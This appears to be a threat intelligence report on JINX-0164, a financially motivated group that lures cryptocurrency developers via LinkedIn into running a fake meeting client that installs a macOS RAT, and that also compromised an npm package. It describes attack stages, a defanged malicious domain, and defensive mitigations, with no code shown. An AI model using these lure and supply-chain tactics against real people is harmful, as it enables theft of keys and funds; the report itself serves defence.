JINX-0164: Financially Motivated Actor Uses Social Engineering and Custom macOS Malware in Crypto Heists

Executive Summary

Security researchers at Wiz have identified a new, financially motivated threat actor, dubbed JINX-0164, that specializes in targeting developers at cryptocurrency firms with custom macOS malware. Active since at least mid-2025, the group employs a multi-stage attack that begins with sophisticated social engineering on professional networks like LinkedIn. Victims are tricked into downloading what appears to be a meeting client, which instead deploys a custom Python-based infostealer and Remote Access Trojan (RAT) named AUDIOFIX. JINX-0164 has also demonstrated supply chain attack capabilities, previously distributing a Go-based backdoor called MiniRAT through a malicious version of a legitimate npm package. The ultimate goal is the theft of digital assets by compromising developer machines and CI/CD pipelines.

Threat Overview

• Threat Actor: JINX-0164
• Targeting: Developers and engineers within the cryptocurrency industry.
• Malware:
  • AUDIOFIX: A Python-based macOS infostealer and RAT.
  • MiniRAT: A Go-based backdoor.
• Attack Vectors: Social engineering, supply chain attack (compromised npm package).
• Motivation: Financial gain through theft of cryptocurrency.

Technical Analysis

The attack chain used by JINX-0164 is well-orchestrated and tailored to its targets:

1. Reconnaissance & Luring (T1589 - Gather Victim Identity Information): The actor identifies developers at crypto firms on LinkedIn and initiates contact with fake job offers or meeting requests.
2. Initial Access (T1566.002 - Phishing: Spearphishing Link): The target is directed to a malicious domain impersonating a legitimate service (e.g., apple.driver-store[.]com).
3. Execution (T1204.002 - User Execution: Malicious File): The user is tricked into downloading and running a malicious file disguised as a meeting client. This file is a bash script.
4. Command and Control / Payload Retrieval (T1105 - Ingress Tool Transfer): The initial bash script downloads the main payload, the AUDIOFIX malware, from the attacker-controlled domain.
5. Malware Capabilities (AUDIOFIX): The Python RAT can upload files from the victim's machine, execute arbitrary shell commands, and download additional payloads, giving the attacker full control.
6. Supply Chain Attack (T1195.002 - Compromise Software Supply Chain: Compromise Software Dependencies): In a separate TTP, the actor compromised the @velora-dex/sdk npm package to distribute the MiniRAT backdoor, showing a higher level of sophistication.

While some TTPs, like targeting crypto developers and using VPN services, are similar to North Korean APT groups like BlueNoroff, researchers have not found sufficient evidence to attribute JINX-0164 to them at this time.

Impact Assessment

JINX-0164 poses a significant threat to the cryptocurrency ecosystem. By specifically targeting developers and their CI/CD infrastructure, the group aims to compromise systems at the heart of digital asset management. A successful attack could lead to:

• Theft of private keys from developer machines.
• Compromise of code repositories to inject malicious code into smart contracts or applications.
• Large-scale theft of funds from the targeted company or its users.
• Significant reputational damage and loss of trust in the compromised platform. The use of custom macOS malware shows that attackers are increasingly focusing on Apple's platform as it becomes more prevalent in corporate and development environments.

IOCs — Directly from Articles

Detection & Response

• Endpoint Monitoring (macOS): Use EDR solutions with macOS support to monitor for suspicious process execution, especially Python scripts running with unusual permissions or making network connections.
• Network Filtering: Block known malicious domains like apple.driver-store[.]com at the network perimeter.
• Dependency Scanning: For development teams, use tools to scan software dependencies for known vulnerabilities or malicious packages. Check the integrity of packages downloaded from repositories like npm.
• Developer Awareness: Train developers on the risks of social engineering attacks targeting them specifically and to be cautious about downloading and executing software from unverified sources.

Mitigation

1. User Training (M1017 - User Training): Educate employees, especially developers, about the specific social engineering tactics used by groups like JINX-0164.
2. Application Vetting: Implement policies that restrict the installation of software from untrusted sources. Use macOS's built-in security features like Gatekeeper and Notarization.
3. Secure CI/CD Pipeline: Harden the CI/CD environment with strict access controls, MFA, and regular audits. Do not store sensitive credentials like private keys on developer workstations.
4. Supply Chain Security: Implement strict controls around the use of third-party libraries. Use private registries or scoped packages and perform security reviews of dependencies.